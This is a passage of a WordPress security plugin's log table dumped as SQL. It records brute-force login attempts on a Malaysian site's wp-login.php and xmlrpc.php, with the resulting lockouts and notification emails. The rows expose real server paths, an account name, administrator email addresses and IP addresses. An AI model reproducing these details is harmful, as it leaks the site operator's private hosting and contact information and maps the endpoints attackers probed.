Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDunkXpgmG5P@iB8kRNAAAAIg\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"108.169.181.185\";s:11:\"REMOTE_PORT\";s:5:\"33458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDunkXpgmG5P@iB8kRNAAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063866.3978\";s:12:\"REQUEST_TIME\";s:10:\"1569063866\";}}','notice','2019-09-21 11:04:28','2019-09-21 11:04:26',18314904,19612528,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'108.169.181.185'),(25454,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:04:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:04:19\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:19:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:19:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:04:20','2019-09-21 11:04:19',17883712,19289696,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.169.181.185'),(25455,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:04:20','2019-09-21 11:04:19',18090088,19289696,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.169.181.185'),(25456,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDs3kXpgmG5P@iB8kRLAAAAJA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.74.123.6\";s:11:\"REMOTE_PORT\";s:5:\"64138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDs3kXpgmG5P@iB8kRLAAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063859.6241\";s:12:\"REQUEST_TIME\";s:10:\"1569063859\";}}','notice','2019-09-21 11:04:21','2019-09-21 11:04:20',17800000,19290832,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.74.123.6'),(25453,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDs3kXpgmG5P@iB8kRKgAAAIA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"108.169.181.185\";s:11:\"REMOTE_PORT\";s:5:\"60246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDs3kXpgmG5P@iB8kRKgAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063859.2541\";s:12:\"REQUEST_TIME\";s:10:\"1569063859\";}}','notice','2019-09-21 11:04:20','2019-09-21 11:04:19',17798960,19289696,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.169.181.185'),(25451,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:04:13','2019-09-21 11:04:12',18089040,19288616,'https://bintara.com.my/wp/wp-login.php',1,0,'178.32.116.253'),(25452,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDsbfBTP0kPOVnb8jpmQAAAEY\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.32.116.253\";s:11:\"REMOTE_PORT\";s:5:\"58238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDsbfBTP0kPOVnb8jpmQAAAEY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063859.2556\";s:12:\"REQUEST_TIME\";s:10:\"1569063859\";}}','notice','2019-09-21 11:04:20','2019-09-21 11:04:19',18312064,19606904,'https://bintara.com.my/wp/xmlrpc.php',1,0,'178.32.116.253'),(25450,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:04:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:04:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:19:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:19:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:04:13','2019-09-21 11:04:12',17883472,19288616,'https://bintara.com.my/wp/wp-login.php',1,0,'178.32.116.253'),(25449,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDpFiJ7D9Gn7wDPh8WHQAAANc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.32.116.253\";s:11:\"REMOTE_PORT\";s:5:\"55834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDpFiJ7D9Gn7wDPh8WHQAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063848.1578\";s:12:\"REQUEST_TIME\";s:10:\"1569063848\";}}','notice','2019-09-21 11:04:13','2019-09-21 11:04:12',17798600,19288616,'https://bintara.com.my/wp/wp-login.php',1,0,'178.32.116.253'),(25448,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDZHkXpgmG5P@iB8kQ1gAAAII\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"54.191.160.201\";s:11:\"REMOTE_PORT\";s:5:\"38184\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDZHkXpgmG5P@iB8kQ1gAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063780.3144\";s:12:\"REQUEST_TIME\";s:10:\"1569063780\";}}','notice','2019-09-21 11:03:03','2019-09-21 11:03:02',18312808,19610840,'https://bintara.com.my/blog/xmlrpc.php',1,0,'54.191.160.201'),(25446,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:02:55','2019-09-21 11:02:54',18086856,19286376,'https://bintara.com.my/blog/wp-login.php',1,0,'54.191.160.201'),(25447,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDX7fBTP0kPOVnb8jplQAAAFU\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"57681\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDX7fBTP0kPOVnb8jplQAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063779.1573\";s:12:\"REQUEST_TIME\";s:10:\"1569063779\";}}','notice','2019-09-21 11:03:00','2019-09-21 11:02:59',18312456,19609760,'https://bintara.com.my/test/xmlrpc.php',1,0,'188.165.250.134'),(25445,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:02:54\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:02:54\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:17:54\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:17:54\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:02:55','2019-09-21 11:02:54',17880872,19286376,'https://bintara.com.my/blog/wp-login.php',1,0,'54.191.160.201'),(25442,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 